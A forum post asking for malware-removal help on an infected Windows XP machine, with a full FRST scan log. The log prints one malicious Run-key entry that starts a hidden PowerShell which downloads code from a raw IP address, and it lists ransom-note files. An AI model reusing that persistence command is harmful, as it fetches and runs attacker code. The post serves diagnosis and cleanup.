Jump to content

Explorer.exe Spawns Many cmd.exe and msiexec.exe Processes, Connects to Many IPs, Eventual BSOD


Recommended Posts

Hopefully someone can help, because after two straight days am at my wits' end.

 

(The FRST log files are after this wall of text)

 

It's a Windows XP SP3 machine, and the following was gleaned from Process Explorer program. Explorer.exe runs sluggishly immediately after logon, taking it's time to bring up the taskbar and desktop icons. It uses over half the processor (and Core 2 Duo 2.something GHz chip) when a window is opened (such as My Computer). It runs poorly but is at least stable, until it is given an internet connection. When connected, the main explorer.exe process then begins spawning multiple cmd.exe and msiexec.exe processes, along with one NOTEPAD.EXE process and a powershell process. All of them, including Explorer, begin connecting to a multitude of IP addresses, and all the while more cmd.exe and msiexec.exe processes are spawned. They slowly eat up RAM, then the page file, until finally the machine runs out of memory and bluescreens, citing TCPIP.sys (or something similar in name) as the culprit.

 

Other information:

1: There is, as far as I can tell, a broken install of McAfee Security Center on the machine. The control interface throws an error page saying that the webpage is unavailable, and the firewall was disabled at some point in the past. The MCPR tool seems to crash either during self-extraction or immediately soon after, and McAfee doesn't appear in the installed programs lists in Programs and Features or CCleaner, so I haven't been able to remove it thus far.

2: Explorer fails to save any alterations to the desktop upon relog or restart.

3: Explorer take s along time to close during logoff, restart, or shutdown.

4: The resolution downgrades itself from the native 1440x900 to 1152x864 upon logon.

5: Explorer opens a window to C:/Program Files/Microsoft, which shows a folder for "Search Enhancement Pack".

 

Many scans were run as part of a CTB-Locker malware removal before finding this forum - hopefully that won't hinder much.

 

====================

FRST.txt:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 04-03-2015
Ran by Maureen (administrator) on TYSONSERVER on 07-03-2015 19:15:27
Running from C:\Documents and Settings\Maureen\Desktop\AV SOFTWARES\FRST [2015-03-04]
Loaded Profiles: Maureen & Administrator (Available profiles: Maureen & Administrator)
Platform: Microsoft Windows XP Professional Service Pack 3 (X86) OS Language: English (United States)
Internet Explorer Version 8 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(HP) C:\Program Files\HP\HPLaserJetService\HPLaserJetService.exe
(iolo technologies, LLC) C:\Program Files\iolo\Common\Lib\ioloServiceManager.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Intel Corporation) C:\WINDOWS\system32\igfxtray.exe
(Intel Corporation) C:\WINDOWS\system32\igfxpers.exe
(Intel Corporation) C:\WINDOWS\system32\igfxsrvc.exe
(Realtek Semiconductor Corp.) C:\WINDOWS\RTHDCPL.exe
(Microsoft® Corporation) C:\Program Files\Common Files\Microsoft Shared\Works Shared\WkUFind.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\HP Share-to-Web\hpgs2wnd.exe
(Hewlett-Packard) C:\Program Files\HP\HP Software Update\hpwuschd2.exe
() C:\PROGRA~1\HEWLET~1\HPSHAR~1\hpgs2wnf.exe
(iolo technologies, LLC) C:\Program Files\iolo\System Mechanic Professional\ioloGovernor.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDCPL] => C:\WINDOWS\RTHDCPL.EXE [16859648 2008-01-09] (Realtek Semiconductor Corp.)
HKLM\...\Run: [Microsoft Works Portfolio] => C:\Program Files\Microsoft Works\WksSb.exe [331830 2001-08-23] (Microsoft® Corporation)
HKLM\...\Run: [Microsoft Works Update Detection] => C:\Program Files\Common Files\Microsoft Shared\Works Shared\WkUFind.exe [28738 2001-08-16] (Microsoft® Corporation)
HKLM\...\Run: [Exaktime SyncCenter] => C:\Program Files\Exaktime\TimeSummit\SyncCenter\SyncCenter.exe [662128 2009-11-09] (Exaktime, Inc.)
HKLM\...\Run: [share-to-Web Namespace Daemon] => C:\Program Files\Hewlett-Packard\HP Share-to-Web\hpgs2wnd.exe [57344 2001-07-03] (Hewlett-Packard)
HKLM\...\Run: [HP Software Update] => C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe [49208 2010-06-09] (Hewlett-Packard)
HKLM\...\Run: [Microsoft Default Manager] => C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe [288080 2009-07-17] (Microsoft Corporation)
HKLM\...\Run: [ioloGovernor] => C:\Program Files\iolo\System Mechanic Professional\ioloGovernor.exe [902672 2015-02-12] (iolo technologies, LLC)
HKLM\...\Run: [sDTray] => C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
HKLM Group Policy restriction on software: %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot% <====== ATTENTION
HKLM Group Policy restriction on software: %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot%*.exe <====== ATTENTION
HKLM Group Policy restriction on software: %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot%System32\*.exe <====== ATTENTION
HKLM Group Policy restriction on software: %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir% <====== ATTENTION
HKLM\...\Policies\Explorer: [TaskbarNoNotification] 1
HKLM\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-1202660629-1592454029-1801674531-1003\...\Run: [WinSystem] => cmd.exe /c start powershell -windowstyle hidden -noninteractive -command "$a = New-Object System.Net.WebClient; $b = $a.DownloadString('http://31.184.194.99:85/landin2?action=psf&pubid=0&subid=0&syste(the data entry has 30 more characters).
HKU\S-1-5-21-1202660629-1592454029-1801674531-1003\...\Policies\Explorer: [TaskbarNoNotification] 1
HKU\S-1-5-18\...\RunOnce: [FlashPlayerUpdate] => C:\WINDOWS\system32\Macromed\Flash\FlashUtil32_11_8_800_94_ActiveX.exe [814984 2013-07-10] (Adobe Systems Incorporated)
BootExecute: autocheck autochk * sdnclean.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-1202660629-1592454029-1801674531-1003\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-1202660629-1592454029-1801674531-1003\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-1202660629-1592454029-1801674531-1003\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-1202660629-1592454029-1801674531-500 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
BHO: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003 -> Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} http://windowsupdate.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1373238207218
Handler: cdo - {CD00020A-8B95-11D1-82DB-00C04FB1625D} - C:\Program Files\Common Files\Microsoft Shared\Web Folders\PKMCDO.DLL (Microsoft Corporation)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} -  No File
Hosts: 127.0.0.1    localhost
Tcpip\..\Interfaces\{2F7F9507-2545-4C5C-B1F8-0A880BE407A7}: [NameServer] 8.8.8.8

FireFox:
========
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\3.0.40818.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @Microsoft.com/NpWinExt,version=4.0 -> C:\Program Files\MSN Toolbar\Platform\4.0.0357.1\npwinext.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: Adobe Acrobat -> C:\Program Files\Adobe\Acrobat 9.0\Acrobat\Air\nppdf32.dll (Adobe Systems Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2013-09-27]
FF HKLM\...\Firefox\Extensions: [msntoolbar@msn.com] - C:\Program Files\MSN Toolbar\Platform\4.0.0357.1\Firefox
FF Extension: MSN Toolbar - C:\Program Files\MSN Toolbar\Platform\4.0.0357.1\Firefox [2014-09-10]
FF HKLM\...\Firefox\Extensions: [{27182e60-b5f3-411c-b545-b44205977502}] - C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension
FF Extension: Search Helper Extension - C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension [2014-09-10]

Chrome:
=======
CHR Profile: C:\Documents and Settings\Maureen\Local Settings\Application Data\Google\Chrome\User Data\Default
CHR Extension: (No Name) - C:\Documents and Settings\Maureen\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2014-12-17]
CHR Extension: (No Name) - C:\Documents and Settings\Maureen\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-12-17]
CHR Extension: (No Name) - C:\Documents and Settings\Maureen\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-12-17]
CHR Extension: (No Name) - C:\Documents and Settings\Maureen\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-12-17]
CHR Extension: (No Name) - C:\Documents and Settings\Maureen\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-12-17]
CHR Extension: (No Name) - C:\Documents and Settings\Maureen\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2014-12-17]
CHR Extension: (Chrome Hotword Shared Module) - C:\Documents and Settings\Maureen\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-03-06]
CHR Extension: (No Name) - C:\Documents and Settings\Maureen\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-12-17]
CHR Extension: (Gmail) - C:\Documents and Settings\Maureen\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-12-17]

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 FLEXnet Licensing Service; C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [651720 2013-07-10] (Macrovision Europe Ltd.) [File not signed]
S2 HomeNetSvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
R2 HP LaserJet Service; C:\Program Files\HP\HPLaserJetService\HPLaserJetService.exe [145920 2010-10-25] (HP) [File not signed]
R2 ioloSystemService; C:\Program Files\iolo\Common\Lib\ioloServiceManager.exe [4702920 2015-02-12] (iolo technologies, LLC)
S2 mcbootdelaystartsvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
S2 McMPFSvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
S2 McNaiAnn; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
S2 mcpltsvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
S2 McProxy; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
R2 MSSQL$EXAKTIME; c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe [29263712 2008-11-25] (Microsoft Corporation)
S4 MSSQLServerADHelper; c:\Program Files\Microsoft SQL Server\90\Shared\sqladhlp90.exe [45408 2008-11-25] (Microsoft Corporation)
R2 SDScannerService; C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
S2 SDWSCService; C:\Program Files\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 cfwids; C:\WINDOWS\System32\drivers\cfwids.sys [62832 2014-06-20] (McAfee, Inc.)
S3 Dot4Scan; C:\WINDOWS\System32\DRIVERS\Dot4Scan.sys [8704 2001-08-17] (Microsoft Corporation)
S3 DS2490; C:\WINDOWS\System32\Drivers\DS2490.sys [50036 2007-01-16] (Dallas Semiconductor MAXIM) [File not signed]
R1 FileDisk; C:\WINDOWS\system32\Drivers\FileDisk.sys [9341 2013-03-17] (iolo technologies, LLC (based on original work by Bo Brantén)) [File not signed]
S3 HipShieldK; C:\WINDOWS\System32\drivers\HipShieldK.sys [147912 2013-09-23] (McAfee, Inc.)
S3 hitmanpro37; C:\WINDOWS\system32\drivers\hitmanpro37.sys [35992 2015-03-07] ()
S3 HPFXBULKLEDM; C:\WINDOWS\System32\drivers\hppcbulkio.sys [20504 2010-12-14] (Hewlett Packard)
S3 HPFXFAX; C:\WINDOWS\System32\drivers\hppcfaxio.sys [21528 2010-12-14] (Hewlett Packard)
R3 ialm; C:\WINDOWS\System32\DRIVERS\igxpmp32.sys [5760096 2007-04-16] (Intel Corporation) [File not signed]
R3 IntcAzAudAddService; C:\WINDOWS\System32\drivers\RtkHDAud.sys [4652544 2008-01-15] (Realtek Semiconductor Corp.) [File not signed]
S3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [114904 2015-03-07] (Malwarebytes Corporation)
S3 mfeapfk; C:\WINDOWS\System32\drivers\mfeapfk.sys [135968 2014-06-20] (McAfee, Inc.)
R3 mfeavfk; C:\WINDOWS\System32\drivers\mfeavfk.sys [238176 2014-06-20] (McAfee, Inc.)
S3 mfebopk; C:\WINDOWS\System32\drivers\mfebopk.sys [67816 2014-06-20] (McAfee, Inc.)
R3 mfefirek; C:\WINDOWS\System32\drivers\mfefirek.sys [369248 2014-06-20] (McAfee, Inc.)
R0 mfehidk; C:\WINDOWS\System32\drivers\mfehidk.sys [576048 2014-06-20] (McAfee, Inc.)
R3 mfencbdc; C:\WINDOWS\System32\DRIVERS\mfencbdc.sys [350240 2014-08-20] (McAfee, Inc.)
S3 mfencrk; C:\WINDOWS\System32\DRIVERS\mfencrk.sys [81296 2014-08-20] (McAfee, Inc.)
S3 mfendisk; C:\WINDOWS\System32\DRIVERS\mfendisk.sys [87520 2014-06-20] (McAfee, Inc.)
R3 mfendiskmp; C:\WINDOWS\System32\DRIVERS\mfendisk.sys [87520 2014-06-20] (McAfee, Inc.)
R1 mfetdi2k; C:\WINDOWS\System32\drivers\mfetdi2k.sys [93624 2014-06-20] (McAfee, Inc.)
S3 PalmUSBD; C:\WINDOWS\System32\drivers\PalmUSBD.sys [16694 2013-12-05] (PalmSource, Inc.) [File not signed]
R2 PDFsFilter; C:\WINDOWS\System32\DRIVERS\PDFsFilter.sys [69016 2015-02-12] (Raxco Software, Inc.)
S3 WLRAWMp50x86; C:\WINDOWS\System32\Drivers\WLRAWMp50x86.sys [28312 2010-10-06] (Logitech, Inc.)
S3 WLRAWSp50x86; C:\WINDOWS\System32\Drivers\WLRAWSp50x86.sys [27032 2010-10-06] (Logitech, Inc.)
S3 catchme; \??\C:\DOCUME~1\Maureen\LOCALS~1\Temp\catchme.sys [X]
S0 cerc6; No ImagePath
S4 IntelIde; No ImagePath
U0 mfewfpk; No ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-03-07 19:03 - 2015-03-07 18:54 - 00449968 ____R () C:\WINDOWS\system32\Drivers\etc\hosts.20150307-190320.backup
2015-03-07 18:54 - 2015-03-07 18:40 - 00000027 _____ () C:\WINDOWS\system32\Drivers\etc\hosts.20150307-185420.backup
2015-03-07 18:44 - 2015-03-07 18:56 - 00000000 ____D () C:\Documents and Settings\NetworkService\Local Settings\temp
2015-03-07 18:44 - 2015-03-07 18:44 - 00017476 _____ () C:\ComboFix.txt
2015-03-07 18:44 - 2015-03-07 18:44 - 00000000 ____D () C:\Documents and Settings\LocalService\Local Settings\temp
2015-03-07 18:44 - 2015-03-07 18:44 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\temp
2015-03-07 18:24 - 2015-03-07 18:45 - 00000000 ____D () C:\ComboFix
2015-03-07 18:11 - 2015-03-07 18:19 - 00065536 _____ () C:\WINDOWS\system32\config\SpybotSD.evt
2015-03-07 17:18 - 2015-03-07 18:57 - 00000644 _____ () C:\WINDOWS\Tasks\Check for updates (Spybot - Search & Destroy).job
2015-03-07 17:18 - 2015-03-07 17:18 - 00000616 _____ () C:\WINDOWS\Tasks\Refresh immunization (Spybot - Search & Destroy).job
2015-03-07 17:18 - 2015-03-07 17:18 - 00000446 _____ () C:\WINDOWS\Tasks\Scan the system (Spybot - Search & Destroy).job
2015-03-07 17:17 - 2015-03-07 18:08 - 00065536 _____ () C:\WINDOWS\system32\config\Spybot -.evt
2015-03-07 17:16 - 2015-03-07 17:17 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Spybot - Search & Destroy 2
2015-03-07 17:16 - 2015-03-07 17:16 - 00001842 _____ () C:\Documents and Settings\All Users\Start Menu\Programs\Spybot-S&D Start Center.lnk
2015-03-07 17:16 - 2015-03-07 17:16 - 00001836 _____ () C:\Documents and Settings\All Users\Desktop\Spybot-S&D Start Center.lnk
2015-03-07 17:16 - 2013-09-20 10:49 - 00018968 _____ (Safer Networking Limited) C:\WINDOWS\system32\sdnclean.exe
2015-03-07 17:15 - 2015-03-07 17:23 - 00000000 ____D () C:\Program Files\Spybot - Search & Destroy 2
2015-03-07 05:14 - 2015-03-07 18:53 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Spybot - Search & Destroy
2015-03-07 05:14 - 2015-03-07 18:11 - 00000000 ____D () C:\Program Files\Spybot - Search & Destroy
2015-03-07 03:08 - 2015-03-07 03:18 - 00000000 ____D () C:\AdwCleaner
2015-03-07 03:02 - 2015-03-07 03:02 - 00003758 _____ () C:\Documents and Settings\Maureen\Desktop\Rkill.txt
2015-03-07 02:14 - 2015-03-07 02:14 - 00001512 _____ () C:\Documents and Settings\All Users\Desktop\Recuva.lnk
2015-03-07 02:14 - 2015-03-07 02:14 - 00000000 ____D () C:\Program Files\Recuva
2015-03-07 02:14 - 2015-03-07 02:14 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Recuva
2015-03-06 19:36 - 2015-03-06 19:36 - 00000909 _____ () C:\Documents and Settings\Maureen\Desktop\JRT.txt
2015-03-06 19:23 - 2015-03-06 19:23 - 00090112 _____ () C:\WINDOWS\Minidump\Mini030615-02.dmp
2015-03-06 18:16 - 2015-03-06 18:16 - 00001324 _____ () C:\Documents and Settings\Maureen\Local Settings\Application Data\d3d9caps.tmp
2015-03-06 17:10 - 2015-03-06 17:10 - 00000924 _____ () C:\Documents and Settings\Maureen\Desktop\Process Explorer.lnk
2015-03-06 17:02 - 2015-03-06 17:01 - 00090112 _____ () C:\WINDOWS\Minidump\Mini030615-01.dmp
2015-03-06 12:37 - 2008-04-13 14:12 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\msiexec.exe
2015-03-06 12:36 - 2008-04-13 14:12 - 01033728 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2015-03-06 08:01 - 2015-03-07 18:59 - 00000000 ____D () C:\Documents and Settings\Maureen\Desktop\AV SOFTWARES
2015-03-06 07:09 - 2015-03-06 07:09 - 00001580 _____ () C:\Documents and Settings\All Users\Desktop\Defraggler.lnk
2015-03-06 07:09 - 2015-03-06 07:09 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Defraggler
2015-03-06 07:08 - 2015-03-06 07:12 - 00000000 ____D () C:\Program Files\Defraggler
2015-03-06 00:53 - 2015-03-07 05:31 - 00114904 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2015-03-06 00:52 - 2015-03-06 00:53 - 00000777 _____ () C:\Documents and Settings\All Users\Desktop\Malwarebytes Anti-Malware.lnk
2015-03-06 00:51 - 2015-03-06 00:52 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Malwarebytes Anti-Malware
2015-03-06 00:50 - 2015-03-06 00:50 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2015-03-06 00:50 - 2014-11-21 06:14 - 00054360 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2015-03-06 00:50 - 2014-11-21 06:14 - 00023256 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbam.sys
2015-03-06 00:39 - 2015-03-06 00:39 - 00145798 ____N () C:\bootex.log
2015-03-06 00:37 - 2015-03-06 00:37 - 00000000 ____D () C:\found.001
2015-03-06 00:08 - 2015-03-07 19:15 - 00000000 ____D () C:\FRST
2015-03-06 00:07 - 2015-03-06 00:07 - 00000000 ____D () C:\Documents and Settings\NetworkService\Application Data\iolo
2015-03-05 23:48 - 2015-03-05 23:48 - 00000000 ___HD () C:\WINDOWS\PIF
2015-03-05 23:35 - 2015-03-06 00:20 - 00001611 _____ () C:\Documents and Settings\Maureen\Desktop\McAfee SecurityCenter.lnk
2015-03-05 22:56 - 2015-03-05 22:56 - 00000000 _RSHD () C:\cmdcons
2015-03-05 22:56 - 2015-03-05 19:33 - 00000211 _____ () C:\Boot.bak
2015-03-05 22:56 - 2004-08-03 23:00 - 00260272 __RSH () C:\cmldr
2015-03-05 22:47 - 2015-03-07 19:15 - 00000000 ____D () C:\Documents and Settings\Maureen\Local Settings\temp
2015-03-05 22:17 - 2015-03-05 22:17 - 00008192 ____H () C:\WINDOWS\system32\config\SECURITY.tmp.LOG
2015-03-05 22:17 - 2015-03-05 22:17 - 00000000 ____H () C:\WINDOWS\system32\config\system.tmp.LOG
2015-03-05 22:17 - 2015-03-05 22:17 - 00000000 ____H () C:\WINDOWS\system32\config\software.tmp.LOG
2015-03-05 22:17 - 2015-03-05 22:17 - 00000000 ____H () C:\WINDOWS\system32\config\SAM.tmp.LOG
2015-03-05 22:17 - 2015-03-05 22:17 - 00000000 ____H () C:\WINDOWS\system32\config\default.tmp.LOG
2015-03-05 21:43 - 2011-06-26 01:45 - 00256000 _____ () C:\WINDOWS\PEV.exe
2015-03-05 21:43 - 2010-11-07 12:20 - 00208896 _____ () C:\WINDOWS\MBR.exe
2015-03-05 21:43 - 2009-04-19 23:56 - 00060416 _____ (NirSoft) C:\WINDOWS\NIRCMD.exe
2015-03-05 21:43 - 2000-08-30 19:00 - 00518144 _____ (SteelWerX) C:\WINDOWS\SWREG.exe
2015-03-05 21:43 - 2000-08-30 19:00 - 00406528 _____ (SteelWerX) C:\WINDOWS\SWSC.exe
2015-03-05 21:43 - 2000-08-30 19:00 - 00212480 _____ (SteelWerX) C:\WINDOWS\SWXCACLS.exe
2015-03-05 21:43 - 2000-08-30 19:00 - 00098816 _____ () C:\WINDOWS\sed.exe
2015-03-05 21:43 - 2000-08-30 19:00 - 00080412 _____ () C:\WINDOWS\grep.exe
2015-03-05 21:43 - 2000-08-30 19:00 - 00068096 _____ () C:\WINDOWS\zip.exe
2015-03-05 21:33 - 2015-03-07 18:44 - 00000000 ____D () C:\Qoobox
2015-03-05 21:33 - 2015-03-05 22:24 - 00000000 ____D () C:\WINDOWS\erdnt
2015-03-05 19:53 - 2015-03-07 18:51 - 00000000 __SHD () C:\WINDOWS\CSC
2015-03-05 19:44 - 2015-03-05 19:52 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\RogueKiller
2015-03-05 19:44 - 2015-03-05 19:44 - 00035064 _____ () C:\WINDOWS\system32\Drivers\TrueSight.sys
2015-03-05 19:34 - 2015-03-05 19:34 - 00000000 ____D () C:\Documents and Settings\Administrator\Application Data\Share-to-Web Upload Folder
2015-03-05 19:30 - 2015-03-05 19:30 - 00000803 _____ () C:\Documents and Settings\Administrator\Start Menu\Programs\Internet Explorer.lnk
2015-03-05 19:30 - 2015-03-05 19:30 - 00000792 _____ () C:\Documents and Settings\Administrator\Start Menu\Programs\Windows Media Player.lnk
2015-03-05 19:30 - 2015-03-05 19:30 - 00000171 _____ () C:\WINDOWS\wmsetup.log
2015-03-05 19:30 - 2015-03-05 19:30 - 00000000 __SHD () C:\Documents and Settings\Administrator\IETldCache
2015-03-05 19:30 - 2015-03-05 19:30 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\Application Data\Google
2015-03-05 19:29 - 2015-03-05 19:35 - 00000178 ___SH () C:\Documents and Settings\Administrator\ntuser.ini
2015-03-05 19:29 - 2015-03-05 19:30 - 00000738 _____ () C:\Documents and Settings\Administrator\Start Menu\Programs\Outlook Express.lnk
2015-03-05 19:29 - 2015-03-05 19:30 - 00000000 ___RD () C:\Documents and Settings\Administrator\Start Menu\Programs\Accessories
2015-03-05 19:29 - 2015-03-05 19:30 - 00000000 ____D () C:\Documents and Settings\Administrator
2015-03-05 19:29 - 2015-02-25 14:58 - 00008604 _____ () C:\Documents and Settings\Administrator\Local Settings\HELP_DECRYPT.HTML
2015-03-05 19:29 - 2015-02-25 14:58 - 00008604 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\HELP_DECRYPT.HTML
2015-03-05 19:29 - 2015-02-25 14:58 - 00008604 _____ () C:\Documents and Settings\Administrator\HELP_DECRYPT.HTML
